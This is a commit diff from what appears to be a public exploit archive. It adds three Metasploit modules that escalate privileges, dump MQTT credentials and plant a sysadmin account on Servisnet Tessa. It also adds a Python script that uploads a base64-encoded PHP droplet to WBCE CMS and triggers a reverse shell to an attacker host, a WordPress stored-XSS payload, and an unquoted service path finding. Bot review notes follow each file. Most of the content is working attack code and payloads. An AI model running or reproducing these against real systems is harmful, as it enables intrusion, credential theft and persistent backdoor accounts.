DB: 2022-02-05

8 changes to exploits/shellcodes

FLAME II MODEM USB - Unquoted Service Path
WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)
Servisnet Tessa - Privilege Escalation (Metasploit)
Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)
Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)

Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)
Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)
This commit is contained in:
Offensive Security 2022-02-05 05:01:59 +00:00
parent ad453a2c73
commit 30be173453
10 changed files with 1137 additions and 0 deletions


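--- /dev/null
+++ b/exploits/multiple/webapps/50712.rb
@@ -0,0 +1,240 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',
+'Description' => %q(
+This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization .
+An API request to "/data-service/users/[userid]" with any low-authority user returns other users' information in response.
+The encrypted password information is included here, but privilage escelation is possible with the active sessionid value.
+var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');
+The logic required for the Authorization header is as above.
+Therefore, after accessing an authorized user ID value and active sessionId value,
+if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added.
+),
+'References' =>
+[
+[ 'CVE', 'CVE-2022-22832' ],
+[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],
+[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
+],
+'Author' =>
+[
+'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
+],
+'License' => MSF_LICENSE,
+'DisclosureDate' => "Dec 22 2021",
+'DefaultOptions' =>
+{
+'RPORT' => 443,
+'SSL' => true
+}
+))
+register_options([
+OptString.new('USERNAME', [true, 'Servisnet Username']),
+OptString.new('PASSWORD', [true, 'Servisnet Password']),
+OptString.new('TARGETURI', [true, 'Base path for application', '/'])
+])
+end
+# split strings to salt
+def split(data, string_to_split)
+word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+string = word.split('"]').join('').split('["').join('')
+return string
+end
+# split JSONs to salt
+def splitJSON(data, string_to_split)
+word = data.scan(/"#{string_to_split}":"([\S\s]*?)"/)
+string = word.split('"]').join('').split('["').join('')
+return string
+end
+# split JSONs to salt none "
+def splitJSON2(data, string_to_split)
+word = data.scan(/"#{string_to_split}":([\S\s]*?),/)[0]
+string = word.split('"]').join('').split('["').join('')
+return string
+end
+def app_path
+res = send_request_cgi({
+# default.a.get( check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /baseURL/
+data = res.body
+#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
+return base_url
+else
+fail_with(Failure::NotVulnerable, 'baseURL not found!')
+end
+end
+def add_user(token, app_path)
+newuser = Rex::Text.rand_text_alpha_lower(8)
+id = Rex::Text.rand_text_numeric(4)
+# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
+json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'
+res = send_request_cgi(
+{
+'method' => 'POST',
+'ctype' => 'application/json',
+'uri' => normalize_uri(target_uri.path, app_path, 'users'),
+'headers' =>
+{
+'Authorization' => token
+},
+'data' => json_data
+})
+if res && res.code == 200 && res.body =~ /localhost/
+print_good("The sysAdmin authorized user has been successfully added.")
+print_status("Username: #{newuser}")
+print_status("Password: 1111111111")
+else
+fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
+end
+end
+def sessionid_check
+res = send_request_cgi({
+# user.usersessionid check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /user.usersessionid/
+return Exploit::CheckCode::Vulnerable
+else
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+end
+def find_admin(token, userid, app_path)
+res = send_request_cgi({
+# token check
+'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
+'headers' =>
+{
+'Authorization' => token
+},
+'method' => 'GET'
+})
+if not res && res.code == 200 && res.body =~ /usersessionid/
+fail_with(Failure::NotVulnerable, 'An error occurred while use Token. Try again.')
+end
+loopid = userid.to_i
+$i = 0
+# The admin userid must be less than the low-authority userid.
+while $i < loopid do
+$i +=1
+res = send_request_cgi({
+# token check
+'uri' => normalize_uri(target_uri.path, app_path, 'users', $i),
+'headers' =>
+{
+'Authorization' => token
+},
+'method' => 'GET'
+})
+if res.code == 200 and res.body.include? '"Sistem Admin"'
+admin_uname = splitJSON(res.body, 'username')
+admin_sessid = splitJSON(res.body, 'usersessionid')
+admin_userid = splitJSON2(res.body, 'id')
+enc_token = Rex::Text.encode_base64('' + admin_uname + ':' + admin_sessid + '')
+token_admin = 'Basic ' + enc_token + ''
+print_good("Excellent! Admin user found.")
+print_good("Admin Username: #{admin_uname}")
+print_good("Admin SessionId: #{admin_sessid}")
+if session_check(token_admin, admin_userid, admin_uname) == "OK"
+break
+end
+end
+end
+end
+def session_check(token, userid, user)
+res = send_request_cgi({
+# session check
+'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
+'headers' =>
+{
+'Authorization' => token
+},
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /managers_codes/
+print_good("Admin session is active.")
+add_user(token, app_path)
+return "OK"
+else
+print_status("Admin user #{user} is not online. Try again later.")
+return "NOT"
+end
+end
+def login_check(user, pass)
+json_data = '{"username": "' + user + '", "password": "' + pass + '"}'
+res = send_request_cgi(
+{
+'method' => 'POST',
+'ctype' => 'application/json',
+'uri' => normalize_uri(target_uri.path, app_path, 'api', 'auth', 'signin'),
+'data' => json_data
+})
+if res && res.code == 200 && res.body =~ /usersessionid/
+sessid = splitJSON(res.body, 'usersessionid')
+userid = splitJSON2(res.body, 'id')
+print_status("Sessionid: #{sessid}")
+print_status("Userid: #{userid}")
+enc_token = Rex::Text.encode_base64('' + user + ':' + sessid + '')
+token = 'Basic ' + enc_token + ''
+print_status("Authorization: #{token}")
+find_admin(token, userid, app_path)
+else
+fail_with(Failure::NotVulnerable, 'An error occurred while login. Try again.')
+end
+end
+def check
+if sessionid_check
+return Exploit::CheckCode::Vulnerable
+else
+return Exploit::CheckCode::Safe
+end
+end
+def run
+unless Exploit::CheckCode::Vulnerable == check
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+login_check(datastore['USERNAME'], datastore['PASSWORD'])
+end
+end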
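Review bot: `check` can never return `CheckCode::Safe`, because `sessionid_check` calls `fail_with` on its non-vulnerable branch and `fail_with` raises, so running `check` against a host that is not Tessa aborts with an error instead of reporting Safe; have `sessionid_check` `return Exploit::CheckCode::Safe` and let `check` decide. In `find_admin`, the sweep test `if res.code == 200 and res.body.include? '"Sistem Admin"'` dereferences `res` without the `res &&` guard used everywhere else in the file, so a dropped connection mid-sweep raises `NoMethodError` rather than failing cleanly, and the loop counter is a process-wide global `$i` visible to every other module in the console where a local `i = 0` / `while i < loopid` would do. Operators should also note that a successful run leaves a persistent 'Sistem Admin' account whose password is the fixed `1111111111` behind the `hxZ8I33nmy9PZNhYhms/Dg==` value in `add_user`, which has to be removed at the end of the engagement.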


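--- /dev/null
+++ b/exploits/multiple/webapps/50713.rb
@@ -0,0 +1,169 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/mqtt'
+class MetasploitModule < Msf::Auxiliary
+include Msf::Exploit::Remote::Tcp
+include Msf::Auxiliary::Scanner
+include Msf::Auxiliary::MQTT
+include Msf::Auxiliary::Report
+include Msf::Auxiliary::AuthBrute
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
+'Description' => %q(
+This module exploits MQTT creds dump vulnerability in Servisnet Tessa.
+The app.js is publicly available which acts as the backend of the application.
+By exposing a default value for the "Authorization" HTTP header,
+it is possible to make unauthenticated requests to some areas of the application.
+Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
+A new admin user can be added to the database with this header obtained in the source code.
+The module tries to log in to the MQTT service with the credentials it has obtained,
+and reflects the response it receives from the service.
+),
+'References' =>
+[
+[ 'CVE', 'CVE-2022-22833' ],
+[ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
+[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
+],
+'Author' =>
+[
+'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
+],
+'License' => MSF_LICENSE,
+'DisclosureDate' => "Dec 22 2021",
+'DefaultOptions' =>
+{
+'RPORT' => 443,
+'SSL' => true
+}
+))
+register_options([
+OptString.new('TARGETURI', [true, 'Base path for application', '/'])
+])
+end
+# split strings to salt
+def split(data, string_to_split)
+word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+string = word.split('"]').join('').split('["').join('')
+return string
+end
+def check_mqtt
+res = send_request_cgi({
+# default.a.get( check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /connectionMQTT/
+data = res.body
+#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
+rhost = mqtt_host.split('mqtts://').join('')
+print_status("MQTT Host: #{mqtt_host}")
+mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]
+print_status("MQTT Port: #{mqtt_port}")
+mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
+print_status("MQTT Endpoint: #{mqtt_end}")
+mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
+print_status("MQTT clientId: #{mqtt_cl}")
+mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
+print_status("MQTT username: #{mqtt_usr}")
+mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
+print_status("MQTT password: #{mqtt_pass}")
+print_status("##### Starting MQTT login sweep #####")
+# Removed brute force materials that can be included for the collection.
+cred_collection = Metasploit::Framework::CredentialCollection.new(
+password: mqtt_pass,
+username: mqtt_usr
+)
+# this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
+cred_collection = prepend_db_passwords(cred_collection)
+scanner = Metasploit::Framework::LoginScanner::MQTT.new(
+host: rhost,
+port: mqtt_port,
+read_timeout: datastore['READ_TIMEOUT'],
+client_id: client_id,
+proxies: datastore['PROXIES'],
+cred_details: cred_collection,
+stop_on_success: datastore['STOP_ON_SUCCESS'],
+bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+connection_timeout: datastore['ConnectTimeout'],
+max_send_size: datastore['TCP::max_send_size'],
+send_delay: datastore['TCP::send_delay'],
+framework: framework,
+framework_module: self,
+ssl: datastore['SSL'],
+ssl_version: datastore['SSLVersion'],
+ssl_verify_mode: datastore['SSLVerifyMode'],
+ssl_cipher: datastore['SSLCipher'],
+local_port: datastore['CPORT'],
+local_host: datastore['CHOST']
+)
+scanner.scan! do |result|
+credential_data = result.to_h
+credential_data.merge!(
+module_fullname: fullname,
+workspace_id: myworkspace_id
+)
+password = result.credential.private
+username = result.credential.public
+if result.success?
+credential_core = create_credential(credential_data)
+credential_data[:core] = credential_core
+create_credential_login(credential_data)
+print_good("MQTT Login Successful: #{username}/#{password}")
+else
+invalidate_login(credential_data)
+vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
+end
+end
+end
+end
+def auth_bypass
+res = send_request_cgi({
+# default.a.defaults.headers.post["Authorization"] check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
+token = split(res.body, 'Authorization')
+print_status("Authorization: #{token}")
+return token
+else
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+end
+def check
+if auth_bypass =~ /Basic/
+return Exploit::CheckCode::Vulnerable
+else
+return Exploit::CheckCode::Safe
+end
+end
+def run
+unless Exploit::CheckCode::Vulnerable == check
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+check_mqtt
+end
+end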
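Review bot: The MQTT login in `check_mqtt` is made to whatever host `app.js` names in `host: '...'` (stripped into `rhost`), not to RHOST, so the module will open a TLS connection to a broker that may be a third-party or cloud host outside the engagement's scope; the description should say so, and the scraped host should be confirmed by the operator (or exposed as an option) before the sweep starts. The extraction is fragile: every `data.scan(...)[0][0]` / `[1][0]` lookup dereferences a match without a nil check, and `username`/`password` deliberately take the second match in the file, so a rebuilt `app.js` with a different ordering yields a `NoMethodError` or the wrong credential rather than a clean failure. `ssl: datastore['SSL']` reuses the HTTP option (default `true`) for the broker connection regardless of whether the scraped URL was `mqtts://` or `mqtt://`; deriving it from the scheme that `rhost = mqtt_host.split('mqtts://').join('')` discards would be safer. As in the sibling modules, `check` cannot return `CheckCode::Safe`, since `auth_bypass` raises via `fail_with` on the non-vulnerable path.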


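--- /dev/null
+++ b/exploits/multiple/webapps/50714.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Auxiliary
+include Msf::Exploit::Remote::HttpClient
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',
+'Description' => %q(
+This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.
+The app.js is publicly available which acts as the backend of the application.
+By exposing a default value for the "Authorization" HTTP header,
+it is possible to make unauthenticated requests to some areas of the application.
+Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.
+A new admin user can be added to the database with this header obtained in the source code.
+),
+'References' =>
+[
+[ 'CVE', 'CVE-2022-22831' ],
+[ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],
+[ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
+],
+'Author' =>
+[
+'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
+],
+'License' => MSF_LICENSE,
+'DisclosureDate' => "Dec 22 2021",
+'DefaultOptions' =>
+{
+'RPORT' => 443,
+'SSL' => true
+}
+))
+register_options([
+OptString.new('TARGETURI', [true, 'Base path for application', '/'])
+])
+end
+# split strings to salt
+def split(data, string_to_split)
+word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+string = word.split('"]').join('').split('["').join('')
+return string
+end
+# for Origin and Referer headers
+def app_path
+res = send_request_cgi({
+# default.a.get( check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /baseURL/
+data = res.body
+#word = data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/)
+base_url = data.scan(/baseURL: '\/([\S\s]*?)'/)[0]
+print_status("baseURL: #{base_url}")
+return base_url
+else
+fail_with(Failure::NotVulnerable, 'baseURL not found!')
+end
+end
+def add_user
+token = auth_bypass
+newuser = Rex::Text.rand_text_alpha_lower(8)
+id = Rex::Text.rand_text_numeric(4)
+# encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
+json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'
+res = send_request_cgi(
+{
+'method' => 'POST',
+'ctype' => 'application/json',
+'uri' => normalize_uri(target_uri.path, app_path, 'users'),
+'headers' =>
+{
+'Authorization' => token
+},
+'data' => json_data
+})
+if res && res.code == 200 && res.body =~ /localhost/
+print_good("The sysAdmin authorized user has been successfully added.")
+print_status("Username: #{newuser}")
+print_status("Password: 1111111111")
+else
+fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
+end
+end
+def auth_bypass
+res = send_request_cgi({
+# default.a.defaults.headers.post["Authorization"] check
+'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
+'method' => 'GET'
+})
+if res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/
+token = split(res.body, 'Authorization')
+print_status("Authorization: #{token}")
+return token
+else
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+end
+def check
+if auth_bypass =~ /Basic/
+return Exploit::CheckCode::Vulnerable
+else
+return Exploit::CheckCode::Safe
+end
+end
+def run
+unless Exploit::CheckCode::Vulnerable == check
+fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+end
+add_user
+end
+end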
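Review bot: The success test in `add_user`, `if res && res.code == 200 && res.body =~ /localhost/`, only proves that the response echoes the `@localhost.local` e-mail the module itself just posted, so a 200 that reflects the submitted record (a validation error page, for example) would be reported as a created sysadmin; matching on the randomised `newuser` value together with the `"Sistem Admin"` role string would be a stronger indicator. The random 4-digit `id` is sent without checking for an existing user, so a collision with a live account is possible and what the backend does in that case is not shown here. `app_path` prints and returns the raw `scan` result (an array) rather than `[0][0]`, which appears to work only because `normalize_uri` joins nested arrays. `check` cannot return `CheckCode::Safe`, since `auth_bypass` raises through `fail_with` instead of returning, and a successful run leaves an account with the fixed password `1111111111` that the operator must clean up.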

108
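--- /dev/null
+++ b/exploits/php/webapps/50707.py
@@ -0,0 +1,108 @@
+# Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
+# Date: 02/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://wbce.org/
+# Software Link: https://wbce.org/de/downloads/
+# Version: 1.5.2
+# Tested on: Linux - PHP Version: 8.0.14
+# Github repo: https://github.com/WBCE/WBCE_CMS
+# -*- coding: utf-8 -*-
+#/usr/bin/env python
+import requests
+import string
+import base64
+import argparse
+import time
+import io
+from bs4 import BeautifulSoup #pip install beautifulsoup4
+PAYLOAD = 'UEsDBBQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMAAAAdDE4YmtuZXYucGhwhVVtT9swEP6OxH8wUaQmUqAJ24epUSYh6CY0CbQC2weGIje5UKuJndkOhSH++85OQqqqtBIizr08eZ6783U8nujoy3zJ4enwAF8ODxToVLMK0pJVTHuhH7u/prOby+urxIlOQid2WZ246Wz68256c3vvSHhKWe08xG4tpN70GJvxZYuGL1PF/kESfQ7D2F1JpiGlCW/KMnZBSiHf39QCyjIZNZxWQI5pTFYxYXlMxnPGx2pBjtkodnMKleBJiCeYN494YIVXNDzTTPAUnpnSyhvVGddlWgi5HPn+q1uzPBlMnm9yrDE5jvzXWjKuUbMznc2uZxNyTvlIExPp+DE8oyfy47cuxX+1lrC11EKx51SBViz3/E04o66H62PWIXsxUfwGpQIypP4+m11dXn2fkG+UlZATLUgbyxScEHK7YIrg39+GaSCZqNBDKM8JF0icalqeOIifLXImPWeM56aiamm7qkS2TArzX9TAPWxrYFsYmG5wYR9Ky+BTaMt0ZBPWVHV+4rXxG4JAZZLVWkhVQ5ZQKemLFyZf24NTsxqcwJGOH0SbxhUaT7cYkXItRQZKJeaZWtbtrAQb3wtck6Za3kylEpRoZAZej+B/1GxV0xUnFnRdD+oEWpn+pvMSy8D4o9d+4z58CLBAOwKifQGnHwbYkhvnO9mbJjP8C7wnL8RUAHKC9wykgpa1mRBs5cS2EiWsFqwE1PBqbgeIosXcov/GZmeCc7BXiGiQFeNUQ44wcyS3jN86kEHah0BdobeiuPjIU9pORSdyKNZ7VbDhvKnSbEH5I+SpCQOtkvdClUjU67CCfqEE/S4JzC6xE8B4uv6lLsO3JWmXhz/U9/r8B5lNzy6Qrct43eikMPF97rDHEHp7+oS0iYhQWFJrk9J6cKDWaQ3Sd1O7vbi+u91GbkDYT9CCbKFo5O2kd7qfHg7ALnqnu+kNIHvpvRVZKVRnxiD7NpR50xJtWuxw2SVircNaiPsfENJTcpXG06OVfNTt6W7mnc73hztI6fBAgm4kJ2H8H1BLAQI/ABQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMACQAAAAAAAAAIAAAAAAAAAB0MThia25ldi5waHAKACAAAAAAAAEAGACAuZAFVv7XAYC5kAVW/tcB6Bk8KTf+1wFQSwUGAAAAAAEAAQBeAAAALgMAAAAA'
+def main():
+parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)')
+parser.add_argument('-x', '--url', type=str, required=True)
+parser.add_argument('-u', '--user', type=str, required=False)
+parser.add_argument('-p', '--password', type=str, required=False)
+parser.add_argument('-ah', '--attacker_host', type=str, required=False)
+parser.add_argument('-ap', '--attacker_port', type=str, required=False)
+args = parser.parse_args()
+print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
+exploit(args, PAYLOAD)
+def exploit(args, payload):
+s2 = requests.Session()
+#login
+body= {'url':'','username_fieldname':'username_t18bknev','password_fieldname':'password_t18bknev','username_t18bknev':args.user,'password_t18bknev':args.password}
+r = s2.post(args.url+'/admin/login/index.php', data=body, allow_redirects=False)
+if(r.status_code==302 and r.headers['location'].find('/start/') != -1):
+print("[*] Login OK")
+else:
+print("[*] Login Failed")
+exit(1)
+time.sleep(1)
+#create droplet
+up = {'userfile':('t18bknev.zip', io.BytesIO(base64.b64decode(PAYLOAD)), "multipart/form-data")}
+r = s2.post(args.url+'/admin/admintools/tool.php?tool=droplets&upload=1', files=up)
+if(r.status_code==200 and r.text.find('1 Droplet(s) imported') != -1):
+print("[*] Droplet OK")
+else:
+print("[*] Exploit Failed")
+exit(1)
+time.sleep(1)
+#get csrf token
+r = s2.get(args.url+'/admin/pages/index.php')
+soup = BeautifulSoup(r.text, 'html.parser')
+formtoken = soup.find('input', {'name':'formtoken'})['value']
+#create page
+body= {'formtoken':formtoken,'title':'t18bknev','type':'wysiwyg','parent':'0','visibility':'public','save':''}
+r = s2.post(args.url+'/admin/pages/add.php', data=body, allow_redirects=False)
+soup = BeautifulSoup(r.text, 'html.parser')
+try:
+page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1]
+print("[*] Page OK ["+page_id+"]")
+except:
+print("[*] Exploit Failed")
+exit(1)
+time.sleep(1)
+#get csrf token
+print("[*] Getting token")
+r = s2.get(args.url+'/admin/pages/modify.php?page_id='+page_id)
+soup = BeautifulSoup(r.text, 'html.parser')
+formtoken = soup.find('input', {'name':'formtoken'})['value']
+section_id = soup.find('input', {'name':'section_id'})['value']
+time.sleep(1)
+#add droplet to page
+body= {'page_id':page_id,'formtoken':formtoken,'section_id':section_id,'content'+section_id:'[[t18bknev]]','modify':'save'}
+r = s2.post(args.url+'/modules/wysiwyg/save.php', data=body, allow_redirects=False)
+if(r.status_code==200 and r.text.find('Page saved') != -1):
+print("[*] Adding droplet OK")
+else:
+print("[*] Exploit Failed")
+exit(1)
+time.sleep(1)
+input("Please make sure that your nc listner is ready...\n\nPRESS ENTER WHEN READY")
+body= {'rev_ip':args.attacker_host,'rev_port':args.attacker_port}
+r = s2.post(args.url+'/pages/t18bknev.php', data=body, allow_redirects=False)
+if(r.status_code==200):
+print("[*] Exploit OK - check your listner")
+exit(0)
+else:
+print("[*] Exploit Failed")
+exit(1)
+if __name__ == '__main__':
+main()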
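Review bot: `PAYLOAD` is an opaque base64 zip that `exploit` uploads as a droplet and later triggers through `rev_ip`/`rev_port`; the archive listing shows a single `t18bknev.php`, but nothing on the page shows what that PHP does, so a tester should decode and read it before pointing the script at a client system, and the script would be far more reviewable if it built the zip from a visible PHP string instead of a blob. `--user`, `--password`, `--attacker_host` and `--attacker_port` are declared `required=False` yet used unconditionally, so omitting one silently sends the form without that field and the run dies with `Login Failed` or a droplet with no callback target rather than a usage error; mark them `required=True`. `#/usr/bin/env python` is not a shebang (no `!`, and not on line 1), and `soup.findAll("script")[9]` ties page-id extraction to the exact script order of this one WBCE build. The droplet and the `t18bknev` page remain on the target after a successful run and should be listed as cleanup items.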


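--- /dev/null
+++ b/exploits/php/webapps/50709.txt
@@ -0,0 +1,28 @@
+# Exploit Title: WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 02-02-2022
+# Exploit Author: Ahmet Serkan Ari
+# Software Link: https://wordpress.org/plugins/ip2location-country-blocker/
+# Version: 2.26.7
+# Tested on: Linux
+# CVE: N/A
+# Thanks: Ceylan Bozogullarindan
+# Description:
+IP2Location Country Blocker is a plugin enables user to block unwanted traffic from accesing Wordpress frontend (blog pages) or backend (admin area) by countries or proxy servers. It helps to reduce spam and unwanted sign ups easily by preventing unwanted visitors from browsing a particular page or entire website.
+An authenticated user is able to inject arbitrary Javascript or HTML code to the "Frontend Settings" interface available in settings page of the plugin (Country Blocker), due to incorrect sanitization of user-supplied data and achieve a Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin versions prior to 2.26.7 are affected by this vulnerability.
+The details of the discovery are given below.
+# Steps To Reproduce:
+1. Install and activate the IP2Location Country Blocker plugin.
+2. Visit the "Frontend Settings" interface available in settings page of the plugin that is named "Country Blocker".
+3. Check the "Enable Frontend Blocking" option.
+4. Choose the "URL" option for the "Display page when visitor is blocked" setting.
+5. Type the payload given below to the "URL" input where is in the "Other Settings" area.
+http://country-blocker-testing.com/test#"'><script>alert(document.domain)</script>
+6. Click the "Save Changes" button.
+7. The XSS will be triggered on the settings page when every visit of an authenticated user.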
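Review bot: The title and the description disagree on the affected range: the heading and `# Version: 2.26.7` name 2.26.7 as vulnerable, while `The plugin versions prior to 2.26.7 are affected by this vulnerability.` implies 2.26.7 is the fixed release, and one of the two should be corrected. The steps also show the payload being saved from, and rendered on, the plugin's own settings page, which in a default WordPress install is reachable only by an administrator; unless a lower-privileged role can reach "Frontend Settings", this is an admin-to-admin stored XSS whose impact is limited and which many vendor policies treat as low or out of scope, so the advisory should state which role was used in step 5. A sentence on whether the payload also renders on the blocked-visitor page (the "URL" is what blocked visitors are sent to) would make the impact claim concrete.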


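--- /dev/null
+++ b/exploits/windows/local/50708.txt
@@ -0,0 +1,26 @@
+# Exploit Title: FLAME II MODEM USB - Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 02-02-2022
+# Vendor Homepage: https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a
+# Software Links : N/A (Is a BAM)
+# Tested Version: N/A
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 BITS
+C:>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+FLAME II HSPA USB MODEM Service FLAME II HSPA USB MODEM Service C:\Program Files (x86)\Internet Telcel\ApplicationController.exe Auto
+C:>sc qc "FLAME II HSPA USB MODEM Service"
+[SC] QueryServiceConfig CORRECTO
+NOMBRE_SERVICIO: FLAME II HSPA USB MODEM Service
+TIPO : 10 WIN32_OWN_PROCESS
+TIPO_INICIO : 2 AUTO_START
+CONTROL_ERROR : 1 NORMAL
+NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Internet Telcel\ApplicationController.exe
+GRUPO_ORDEN_CARGA :
+ETIQUETA : 0
+NOMBRE_MOSTRAR : FLAME II HSPA USB MODEM Service
+DEPENDENCIAS :
+NOMBRE_INICIO_SERVICIO: LocalSystem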
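Review bot: The listing establishes the unquoted path (`C:\Program Files (x86)\Internet Telcel\ApplicationController.exe`, `AUTO_START`, `LocalSystem`) but not the second half of the exploitation condition: a local user must be able to create `C:\Program.exe` or `C:\Program Files (x86)\Internet.exe`, and neither `C:\` nor `C:\Program Files (x86)\` is writable by standard users on a default Windows 10 install. An `icacls "C:\Program Files (x86)"` and `icacls "C:\Program Files (x86)\Internet Telcel"` result showing write access for `BUILTIN\Users` or `Authenticated Users` is what turns this from a hardening finding into a privilege escalation, and the advisory should include it or state that it was not checked. `# Tested Version: N/A` also leaves the reader unable to tell which installer build was examined.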


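--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11437,6 +11437,7 @@ id,file,description,date,author,type,platform,port
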